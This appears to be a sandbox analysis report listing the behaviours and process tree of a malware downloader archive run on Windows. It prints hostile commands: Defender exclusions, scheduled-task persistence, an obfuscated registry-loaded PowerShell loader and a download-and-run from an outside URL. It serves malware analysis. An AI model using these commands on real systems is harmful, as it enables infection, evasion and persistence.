| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\" -spe -an -ai#7zMap32033:140:7zEvent31558
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\" -spe -an -ai#7zMap21426:192:7zEvent28676
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1422648120142377316586014131649600467-343676124-14957699643082436722037865802"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.0.1807589521\1161241514" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1240 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {540087b3-7ccf-4d1c-a059-e41819ebe74d} 952 "\\.\pipe\gecko-crash-server-pipe.952" 1340 feef158 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.1.871890360\700763944" -parentBuildID 20221007134813 -prefsHandle 1528 -prefMapHandle 1524 -prefsLen 20928 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {766ea588-348d-4b6c-a457-c5ec797b63f1} 952 "\\.\pipe\gecko-crash-server-pipe.952" 1540 d70758 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.2.868826732\2005783715" -childID 1 -isForBrowser -prefsHandle 2040 -prefMapHandle 2036 -prefsLen 20966 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2224044-e215-4976-b198-4ace77dca3b6} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2056 fe69658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.3.1105638676\2074281319" -childID 2 -isForBrowser -prefsHandle 2636 -prefMapHandle 2632 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4508e40-a4bd-4769-9f2d-64487a579ae8} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2648 1c109358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.4.387133533\1534764246" -childID 3 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6edf259-cfdb-4a75-b404-1bfd76cfd49d} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2952 1d076958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.5.129225872\1689351649" -childID 4 -isForBrowser -prefsHandle 3860 -prefMapHandle 3856 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d750917-b068-41ce-a483-a1bad25e3e35} 952 "\\.\pipe\gecko-crash-server-pipe.952" 3872 1f46cb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.6.1804687658\1562654489" -childID 5 -isForBrowser -prefsHandle 3988 -prefMapHandle 3992 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1719c10-862e-418c-b010-03b38e6c2085} 952 "\\.\pipe\gecko-crash-server-pipe.952" 3980 1f46ef58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.7.1811302836\1184689125" -childID 6 -isForBrowser -prefsHandle 4180 -prefMapHandle 4184 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8da1466b-11c7-4c56-a51b-c8878f177343} 952 "\\.\pipe\gecko-crash-server-pipe.952" 4172 1f46da58 tab
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.8.1126244122\2038192603" -childID 7 -isForBrowser -prefsHandle 4464 -prefMapHandle 4460 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ebf790a-5af9-46a4-bcba-d0db0725e0e1} 952 "\\.\pipe\gecko-crash-server-pipe.952" 4476 23ad0558 tab
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\getlab.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\getlab.exe"
C:\Users\Admin\AppData\Local\Temp\is-H4VJ0.tmp\getlab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H4VJ0.tmp\getlab.tmp" /SL5="$50216,3315090,56832,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\getlab.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
"C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe" -i
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\System32\drivers\etc\hosts
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.9.1446847228\588130600" -childID 8 -isForBrowser -prefsHandle 3960 -prefMapHandle 3948 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2de5566e-3540-4764-8c18-ad40747c0ec1} 952 "\\.\pipe\gecko-crash-server-pipe.952" 3956 1b895358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.10.1884463544\2018580230" -childID 9 -isForBrowser -prefsHandle 1108 -prefMapHandle 3948 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7c33bc4-ea3d-432c-b08d-eed29796003a} 952 "\\.\pipe\gecko-crash-server-pipe.952" 1116 1c028758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.11.2078662493\417643880" -childID 10 -isForBrowser -prefsHandle 2372 -prefMapHandle 1108 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f449bd98-e6f6-4959-89de-d08bab356845} 952 "\\.\pipe\gecko-crash-server-pipe.952" 2160 1fd0df58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="952.12.1547294523\49168901" -childID 11 -isForBrowser -prefsHandle 1108 -prefMapHandle 2372 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ce6c281-65d6-4513-b8ab-8d63fd131a20} 952 "\\.\pipe\gecko-crash-server-pipe.952" 4660 23a74e58 tab
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n /f "C:\Users\Admin\Desktop\RedoClear.dot"
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\Desktop\ExitPublish.pptm"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RequestSearch.bat
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-799836794608972468-19476862801382848759-2038008279-7848065921347270234-824849411"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pjxho1wlkp.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pjxho1wlkp.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pjxho1wlkp.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pjxho1wlkp.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\8fc809.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\8fc809.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\calendar.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\calendar.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bp.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bp.exe"
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\T3.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\T3.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\winbox.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\winbox.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bundle.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bundle.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\fkydjyhjadg.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\fkydjyhjadg.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe'
C:\Users\Admin\AppData\Local\Temp\143025086.exe
C:\Users\Admin\AppData\Local\Temp\143025086.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\o.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\o.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hbrq7ikJ2HdF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\RuntimeBroker.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\RuntimeBroker.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Svd8I7YPSQ3K.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3156 -s 640
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\yoc2BHO9dwWq.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\12.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\12.exe"
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\js.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\js.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nOayiyqfpA1O.bat" "
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\MK.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\MK.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\WEBDOWN.EXE
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/CALENDAR.EXE "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\calendar.exe" RUN
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\list.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\list.exe"
C:\Users\Admin\AppData\Local\Temp\is-QI44L.tmp\list.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QI44L.tmp\list.tmp" /SL5="$F0172,3475144,54272,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\list.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause video-minimizer_12122
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause video-minimizer_12122
C:\Users\Admin\AppData\Local\Video Minimizer 2.31\videominimizer.exe
"C:\Users\Admin\AppData\Local\Video Minimizer 2.31\videominimizer.exe" -i
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\tpeinf.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\tpeinf.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jGJjylnQwEBZ.bat" "
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "637624638424189338974532999-113107869720445793291801566231335163058-628035822"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Armanivenntii_crypted_EASY.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Armanivenntii_crypted_EASY.exe"
C:\Users\Admin\AppData\Local\Temp\863219876.exe
C:\Users\Admin\AppData\Local\Temp\863219876.exe
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Security.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Security.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\scancop.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\scancop.exe"
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\$77Security.exe
"C:\Users\Admin\AppData\Local\Temp\$77Security.exe"
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {DB923CB2-A348-4A97-9A63-743439534ACD} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PHItso8lBIkf.bat" "
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-643128098485438550-1038270920-20339524531173644753-755222011-1906680013624942674"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\loader.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\loader.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-482281963263682992-1791600313-22971689620367521210928758621245120239-265219107"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 52
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0c7ce964-fb27-45fc-8429-5a32a47e8a0b}
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\mnftyjkrgjsae.exe
